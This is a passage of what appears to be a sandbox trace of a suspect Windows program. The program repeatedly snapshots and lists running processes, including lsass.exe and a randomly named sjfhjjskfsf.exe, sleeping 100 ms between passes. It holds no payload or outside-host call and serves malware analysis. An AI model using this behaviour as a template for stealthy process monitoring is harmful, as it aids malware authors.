cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.283] Process32NextW (in: hSnapshot=0x1a4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0217.283] Process32NextW (in: hSnapshot=0x1a4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.283] Process32NextW (in: hSnapshot=0x1a4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.284] Process32NextW (in: hSnapshot=0x1a4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0217.284] Process32NextW (in: hSnapshot=0x1a4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0217.284] Process32NextW (in: hSnapshot=0x1a4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0217.285] Process32NextW (in: hSnapshot=0x1a4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0217.285] Process32NextW (in: hSnapshot=0x1a4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0217.285] Process32NextW (in: hSnapshot=0x1a4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.286] Process32NextW (in: hSnapshot=0x1a4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0217.286] Process32NextW (in: hSnapshot=0x1a4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0217.286] Process32NextW (in: hSnapshot=0x1a4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0217.287] Process32NextW (in: hSnapshot=0x1a4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0217.287] Sleep (dwMilliseconds=0x64) [0217.398] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a8 [0217.400] Process32FirstW (in: hSnapshot=0x1a8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0217.400] Process32NextW (in: hSnapshot=0x1a8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0217.448] Process32NextW (in: hSnapshot=0x1a8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0217.448] Process32NextW (in: hSnapshot=0x1a8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0217.448] Process32NextW (in: hSnapshot=0x1a8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0217.449] Process32NextW (in: hSnapshot=0x1a8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0217.449] Process32NextW (in: hSnapshot=0x1a8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0217.449] Process32NextW (in: hSnapshot=0x1a8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0217.450] Process32NextW (in: hSnapshot=0x1a8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0217.450] Process32NextW (in: hSnapshot=0x1a8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0217.450] Process32NextW (in: hSnapshot=0x1a8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.451] Process32NextW (in: hSnapshot=0x1a8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.451] Process32NextW (in: hSnapshot=0x1a8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.451] Process32NextW (in: hSnapshot=0x1a8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.452] Process32NextW (in: hSnapshot=0x1a8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.452] Process32NextW (in: hSnapshot=0x1a8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0217.452] Process32NextW (in: hSnapshot=0x1a8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.453] Process32NextW (in: hSnapshot=0x1a8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.453] Process32NextW (in: hSnapshot=0x1a8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0217.453] Process32NextW (in: hSnapshot=0x1a8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0217.453] Process32NextW (in: hSnapshot=0x1a8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0217.454] Process32NextW (in: hSnapshot=0x1a8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0217.454] Process32NextW (in: hSnapshot=0x1a8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0217.454] Process32NextW (in: hSnapshot=0x1a8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.455] Process32NextW (in: hSnapshot=0x1a8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0217.455] Process32NextW (in: hSnapshot=0x1a8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0217.455] Process32NextW (in: hSnapshot=0x1a8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0217.456] Process32NextW (in: hSnapshot=0x1a8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0217.456] Sleep (dwMilliseconds=0x64) [0217.556] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1ac [0217.558] Process32FirstW (in: hSnapshot=0x1ac, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0217.559] Process32NextW (in: hSnapshot=0x1ac, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0217.559] Process32NextW (in: hSnapshot=0x1ac, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0217.559] Process32NextW (in: hSnapshot=0x1ac, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0217.560] Process32NextW (in: hSnapshot=0x1ac, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0217.560] Process32NextW (in: hSnapshot=0x1ac, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0217.560] Process32NextW (in: hSnapshot=0x1ac, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0217.561] Process32NextW (in: hSnapshot=0x1ac, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0217.561] Process32NextW (in: hSnapshot=0x1ac, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0217.561] Process32NextW (in: hSnapshot=0x1ac, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0217.562] Process32NextW (in: hSnapshot=0x1ac, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.562] Process32NextW (in: hSnapshot=0x1ac, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.562] Process32NextW (in: hSnapshot=0x1ac, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.562] Process32NextW (in: hSnapshot=0x1ac, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.563] Process32NextW (in: hSnapshot=0x1ac, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.563] Process32NextW (in: hSnapshot=0x1ac, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0217.563] Process32NextW (in: hSnapshot=0x1ac, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.564] Process32NextW (in: hSnapshot=0x1ac, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.564] Process32NextW (in: hSnapshot=0x1ac, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0217.564] Process32NextW (in: hSnapshot=0x1ac, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0217.565] Process32NextW (in: hSnapshot=0x1ac, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0217.565] Process32NextW (in: hSnapshot=0x1ac, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0217.565] Process32NextW (in: hSnapshot=0x1ac, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0217.566] Process32NextW (in: hSnapshot=0x1ac, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.566] Process32NextW (in: hSnapshot=0x1ac, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0217.566] Process32NextW (in: hSnapshot=0x1ac, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0217.567] Process32NextW (in: hSnapshot=0x1ac, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0217.567] Process32NextW (in: hSnapshot=0x1ac, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0217.567] Sleep (dwMilliseconds=0x64) [0217.674] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b0 [0217.675] Process32FirstW (in: hSnapshot=0x1b0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0217.676] Process32NextW (in: hSnapshot=0x1b0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0217.676] Process32NextW (in: hSnapshot=0x1b0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0217.676] Process32NextW (in: hSnapshot=0x1b0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0217.677] Process32NextW (in: hSnapshot=0x1b0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0217.677] Process32NextW (in: hSnapshot=0x1b0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0217.677] Process32NextW (in: hSnapshot=0x1b0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0217.678] Process32NextW (in: hSnapshot=0x1b0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0217.678] Process32NextW (in: hSnapshot=0x1b0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0217.678] Process32NextW (in: hSnapshot=0x1b0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0217.679] Process32NextW (in: hSnapshot=0x1b0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.679] Process32NextW (in: hSnapshot=0x1b0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, 